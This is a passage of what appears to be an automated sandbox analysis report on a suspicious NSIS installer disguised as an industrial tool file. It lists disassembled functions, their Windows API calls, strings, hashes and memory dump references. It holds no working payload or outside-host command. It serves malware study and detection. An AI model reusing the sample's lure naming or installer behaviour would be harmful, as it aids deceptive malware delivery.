                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: df052f8500bc354d4a21ff453bca24a979c322da877604b446898ac79d7ea655
                                                                                                                                                                                                                          • Instruction ID: 747aed367833ce7965c7456030a986fa8c308b51e1337f5c25afca0a07e996cc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df052f8500bc354d4a21ff453bca24a979c322da877604b446898ac79d7ea655
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35F17670D00229CBCF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF44
                                                                                                                                                                                                                          Function 00406001 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindFirstFileA.KERNELBASE(766B3410,00421570,Unconsiderately97.gra,004058A0,Unconsiderately97.gra,Unconsiderately97.gra,00000000,Unconsiderately97.gra,Unconsiderately97.gra,766B3410,?,C:\Users\user\AppData\Local\Temp\,004055BF,?,766B3410,C:\Users\user\AppData\Local\Temp\), ref: 0040600C
                                                                                                                                                                                                                          • FindClose.KERNELBASE(00000000), ref: 00406018
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                          • String ID: Unconsiderately97.gra
                                                                                                                                                                                                                          • API String ID: 2295610775-3192565651
                                                                                                                                                                                                                          • Opcode ID: 84c008b5a35429018b57d61e4d5c1136775b4467134940db04eeaa1c515e45d8
                                                                                                                                                                                                                          • Instruction ID: d1357e632777a99f3a46a744368fc942f06971bdd1fac7e5a473789d9e822290
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84c008b5a35429018b57d61e4d5c1136775b4467134940db04eeaa1c515e45d8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22D012319481206BC3105B78AC0C85B7E98AF5A3303618A72F226F12F4D7349C6286AD
                                                                                                                                                                                                                          Function 00403A0F Relevance: 61.6, APIs: 32, Strings: 3, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 181 403a0f-403a21 182 403b62-403b71 181->182 183 403a27-403a2d 181->183 185 403bc0-403bd5 182->185 186 403b73-403bbb GetDlgItem * 2 call 403ee2 SetClassLongA call 40140b 182->186 183->182 184 403a33-403a3c 183->184 187 403a51-403a54 184->187 188 403a3e-403a4b SetWindowPos 184->188 190 403c15-403c1a call 403f2e 185->190 191 403bd7-403bda 185->191 186->185 192 403a56-403a68 ShowWindow 187->192 193 403a6e-403a74 187->193 188->187 198 403c1f-403c3a 190->198 195 403bdc-403be7 call 401389 191->195 196 403c0d-403c0f 191->196 192->193 199 403a90-403a93 193->199 200 403a76-403a8b DestroyWindow 193->200 195->196 218 403be9-403c08 SendMessageA 195->218 196->190 203 403eaf 196->203 204 403c43-403c49 198->204 205 403c3c-403c3e call 40140b 198->205 209 403a95-403aa1 SetWindowLongA 199->209 210 403aa6-403aac 199->210 207 403e8c-403e92 200->207 206 403eb1-403eb8 203->206 214 403e6d-403e86 DestroyWindow EndDialog 204->214 215 403c4f-403c5a 204->215 205->204 207->203 212 403e94-403e9a 207->212 209->206 216 403ab2-403ac3 GetDlgItem 210->216 217 403b4f-403b5d call 403f49 210->217 212->203 219 403e9c-403ea5 ShowWindow 212->219 214->207 215->214 220 403c60-403cad call 405d1f call 403ee2 * 3 GetDlgItem 215->220 221 403ae2-403ae5 216->221 222 403ac5-403adc SendMessageA IsWindowEnabled 216->222 217->206 218->206 219->203 251 403cb7-403cf3 ShowWindow KiUserCallbackDispatcher call 403f04 EnableWindow 220->251 252 403caf-403cb4 220->252 226 403ae7-403ae8 221->226 227 403aea-403aed 221->227 222->203 222->221 229 403b18-403b1d call 403ebb 226->229 230 403afb-403b00 227->230 231 403aef-403af5 227->231 229->217 232 403b02-403b08 230->232 233 403b36-403b49 SendMessageA 230->233 231->233 236 403af7-403af9 231->236 237 403b0a-403b10 call 40140b 232->237 238 403b1f-403b28 call 40140b 232->238 233->217 236->229 247 403b16 237->247 238->217 248 403b2a-403b34 238->248 247->229 248->247 255 403cf5-403cf6 251->255 256 403cf8 251->256 252->251 257 403cfa-403d28 GetSystemMenu EnableMenuItem SendMessageA 255->257 256->257 258 403d2a-403d3b SendMessageA 257->258 259 403d3d 257->259 260 403d43-403d7c call 403f17 call 405cfd lstrlenA call 405d1f SetWindowTextA call 401389 258->260 259->260 260->198 269 403d82-403d84 260->269 269->198 270 403d8a-403d8e 269->270 271 403d90-403d96 270->271 272 403dad-403dc1 DestroyWindow 270->272 271->203 273 403d9c-403da2 271->273 272->207 274 403dc7-403df4 CreateDialogParamA 272->274 273->198 275 403da8 273->275 274->207 276 403dfa-403e51 call 403ee2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 274->276 275->203 276->203 281 403e53-403e66 ShowWindow call 403f2e 276->281 283 403e6b 281->283 283->207
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A4B
                                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00403A68
                                                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00403A7C
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A98
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403AB9
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403ACD
                                                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403AD4
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403B82
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403B8C
                                                                                                                                                                                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403BA6
                                                                                                                                                                                                                          • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403BF7
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403C9D
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403CBE
                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403CD0
                                                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403CEB
                                                                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403D01
                                                                                                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00403D08
                                                                                                                                                                                                                          • SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403D20
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D33
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Hil Setup: Installing,?,Hil Setup: Installing,00422F20), ref: 00403D5C
                                                                                                                                                                                                                          • SetWindowTextA.USER32(?,Hil Setup: Installing), ref: 00403D6B
                                                                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 00403E9F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                          • String ID: Click Next to continue.$Hil Setup: Installing$LN
                                                                                                                                                                                                                          • API String ID: 3282139019-1732471241
                                                                                                                                                                                                                          • Opcode ID: 1f421d7c43ed257896a6f8de1d3a09a02bb6a4aebe3142dd1b3890e8583c66ce
                                                                                                                                                                                                                          • Instruction ID: 59f0c632d138382d557344a1f3b7ccf8545d810693bdce96ba14c4126dbc1e18
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f421d7c43ed257896a6f8de1d3a09a02bb6a4aebe3142dd1b3890e8583c66ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24C1E171A04205BBDB21AF21ED84E2B3E7CFB44706B50453EF611B11E1C779A942AB6E
                                                                                                                                                                                                                          Function 0040367D Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 284 40367d-403695 call 406092 287 403697-4036a7 call 405c5b 284->287 288 4036a9-4036da call 405be4 284->288 297 4036fd-403726 call 403942 call 40585d 287->297 293 4036f2-4036f8 lstrcatA 288->293 294 4036dc-4036ed call 405be4 288->294 293->297 294->293 302 40372c-403731 297->302 303 4037ad-4037b5 call 40585d 297->303 302->303 304 403733-403757 call 405be4 302->304 309 4037c3-4037e8 LoadImageA 303->309 310 4037b7-4037be call 405d1f 303->310 304->303 311 403759-40375b 304->311 313 403869-403871 call 40140b 309->313 314 4037ea-40381a RegisterClassA 309->314 310->309 315 40376c-403778 lstrlenA 311->315 316 40375d-40376a call 40579a 311->316 325 403873-403876 313->325 326 40387b-403886 call 403942 313->326 317 403820-403864 SystemParametersInfoA CreateWindowExA 314->317 318 403938 314->318 322 4037a0-4037a8 call 40576f call 405cfd 315->322 323 40377a-403788 lstrcmpiA 315->323 316->315 317->313 321 40393a-403941 318->321 322->303 323->322 329 40378a-403794 GetFileAttributesA 323->329 325->321 337 40388c-4038a6 ShowWindow call 406028 326->337 338 40390f-403910 call 404fe8 326->338 332 403796-403798 329->332 333 40379a-40379b call 4057b6 329->333 332->322 332->333 333->322 345 4038b2-4038c4 GetClassInfoA 337->345 346 4038a8-4038ad call 406028 337->346 341 403915-403917 338->341 343 403931-403933 call 40140b 341->343 344 403919-40391f 341->344 343->318 344->325 347 403925-40392c call 40140b 344->347 350 4038c6-4038d6 GetClassInfoA RegisterClassA 345->350 351 4038dc-4038ff DialogBoxParamA call 40140b 345->351 346->345 347->325 350->351 355 403904-40390d call 4035cd 351->355 355->321
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406092: GetModuleHandleA.KERNEL32(?,?,?,00403147,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004060A4
                                                                                                                                                                                                                            • Part of subcall function 00406092: GetProcAddress.KERNEL32(00000000,?), ref: 004060BF
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(1033,Hil Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Hil Setup: Installing,00000000,00000002,766B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe",00000000), ref: 004036F8
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\falden\myotonias\nonvoting,1033,Hil Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Hil Setup: Installing,00000000,00000002,766B3410), ref: 0040376D
                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,.exe), ref: 00403780
                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(Call), ref: 0040378B
                                                                                                                                                                                                                          • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\falden\myotonias\nonvoting), ref: 004037D4
                                                                                                                                                                                                                            • Part of subcall function 00405C5B: wsprintfA.USER32 ref: 00405C68
                                                                                                                                                                                                                          • RegisterClassA.USER32(00422EC0), ref: 00403811
                                                                                                                                                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403829
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040385E
                                                                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403894
                                                                                                                                                                                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,00422EC0), ref: 004038C0
                                                                                                                                                                                                                          • GetClassInfoA.USER32(00000000,RichEdit,00422EC0), ref: 004038CD
                                                                                                                                                                                                                          • RegisterClassA.USER32(00422EC0), ref: 004038D6
                                                                                                                                                                                                                          • DialogBoxParamA.USER32(?,00000000,00403A0F,00000000), ref: 004038F5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\falden\myotonias\nonvoting$Call$Control Panel\Desktop\ResourceLocale$Hil Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                          • API String ID: 1975747703-575262086
                                                                                                                                                                                                                          • Opcode ID: 2e387363e993ac872dd22a4a86a2e1b7be33974681a194842b750a3d4ff7c9b8
                                                                                                                                                                                                                          • Instruction ID: 7b7c40b23c28382cce88422b139422c0b39d4688b8d1f116fbeb90bdc2aa80af
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e387363e993ac872dd22a4a86a2e1b7be33974681a194842b750a3d4ff7c9b8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E161C7B46442007ED620BF61AD45F273AACEB4474AF40847FF945B22E1C77CAD069A3E
                                                                                                                                                                                                                          Function 00402C66 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 182COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 358 402c66-402cb4 GetTickCount GetModuleFileNameA call 405970 361 402cc0-402cee call 405cfd call 4057b6 call 405cfd GetFileSize 358->361 362 402cb6-402cbb 358->362 370 402cf4 361->370 371 402ddb-402de9 call 402c02 361->371 363 402e98-402e9c 362->363 373 402cf9-402d10 370->373 377 402deb-402dee 371->377 378 402e3e-402e43 371->378 375 402d12 373->375 376 402d14-402d1d call 40307b 373->376 375->376 384 402d23-402d2a 376->384 385 402e45-402e4d call 402c02 376->385 380 402df0-402e08 call 403091 call 40307b 377->380 381 402e12-402e3c GlobalAlloc call 403091 call 402e9f 377->381 378->363 380->378 404 402e0a-402e10 380->404 381->378 409 402e4f-402e60 381->409 389 402da6-402daa 384->389 390 402d2c-402d40 call 40592b 384->390 385->378 394 402db4-402dba 389->394 395 402dac-402db3 call 402c02 389->395 390->394 407 402d42-402d49 390->407 400 402dc9-402dd3 394->400 401 402dbc-402dc6 call 406107 394->401 395->394 400->373 408 402dd9 400->408 401->400 404->378 404->381 407->394 413 402d4b-402d52 407->413 408->371 410 402e62 409->410 411 402e68-402e6d 409->411 410->411 414 402e6e-402e74 411->414 413->394 415 402d54-402d5b 413->415 414->414 416 402e76-402e91 SetFilePointer call 40592b 414->416 415->394 417 402d5d-402d64 415->417 421 402e96 416->421 417->394 418 402d66-402d86 417->418 418->378 420 402d8c-402d90 418->420 422 402d92-402d96 420->422 423 402d98-402da0 420->423 421->363 422->408 422->423 423->394 424 402da2-402da4 423->424 424->394
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402C77
                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe,00000400), ref: 00402C93
                                                                                                                                                                                                                            • Part of subcall function 00405970: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe,80000000,00000003), ref: 00405974
                                                                                                                                                                                                                            • Part of subcall function 00405970: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405996
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe,C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe,80000000,00000003), ref: 00402CDF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Error launching installer, xrefs: 00402CB6
                                                                                                                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                                                                                                                                                                                          • SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, xrefs: 00402CD3
                                                                                                                                                                                                                          • C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
                                                                                                                                                                                                                          • Null, xrefs: 00402D5D
                                                                                                                                                                                                                          • "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe", xrefs: 00402C66
                                                                                                                                                                                                                          • soft, xrefs: 00402D54
                                                                                                                                                                                                                          • hA, xrefs: 00402CF4
                                                                                                                                                                                                                          • Inst, xrefs: 00402D4B
                                                                                                                                                                                                                          • C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe$soft$hA
                                                                                                                                                                                                                          • API String ID: 4283519449-1200565577
                                                                                                                                                                                                                          • Opcode ID: 152ac9b7a1b1dc19f9c0e8349d0464e237808c5fe7e9e051921f38e6572f43da
                                                                                                                                                                                                                          • Instruction ID: 8c4c774c716df1ba4ed4283b0a2f2a309b4ff87d1887d614af3d34fab0b2b326
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 152ac9b7a1b1dc19f9c0e8349d0464e237808c5fe7e9e051921f38e6572f43da
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A51B3B1A41214ABDF209F65DE89B9E7AB8EF00355F10403BF904B62D1C7BC9D418BAD
                                                                                                                                                                                                                          Function 00404F16 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 823 404f16-404f2b 824 404fe1-404fe5 823->824 825 404f31-404f43 823->825 826 404f45-404f49 call 405d1f 825->826 827 404f4e-404f5a lstrlenA 825->827 826->827 828 404f77-404f7b 827->828 829 404f5c-404f6c lstrlenA 827->829 832 404f8a-404f8e 828->832 833 404f7d-404f84 SetWindowTextA 828->833 829->824 831 404f6e-404f72 lstrcatA 829->831 831->828 834 404f90-404fd2 SendMessageA * 3 832->834 835 404fd4-404fd6 832->835 833->832 834->835 835->824 836 404fd8-404fdb 835->836 836->824
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4F
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00402FCF,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5F
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00402FCF,00402FCF,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,00000000,0040E8D8,00000000), ref: 00404F72
                                                                                                                                                                                                                          • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll), ref: 00404F84
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FD2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1493104544.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493078061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493133802.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493160105.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1493366542.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsz3421.tmp\System.dll
                                                                                                                                                                                                                          • API String ID: 2531174081-4067285136
                                                                                                                                                                                                                          • Opcode ID: a7998a57e19000565b5b9baf7337a7144b151b5073ee75d1282d145049573e19
                                                                                                                                                                                                                          • Instruction ID: eca0c9fc351864773e3873b1aaef0297ce596284c077fb9535b250fc548d2f5f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7998a57e19000565b5b9baf7337a7144b151b5073ee75d1282d145049573e19
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D219DB1900119BBDF119FA5CD849DEBFB9EF44354F14807AFA04B6290C7798A41CBA8
                                                                                                                                                                                                                          Function 004053DC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
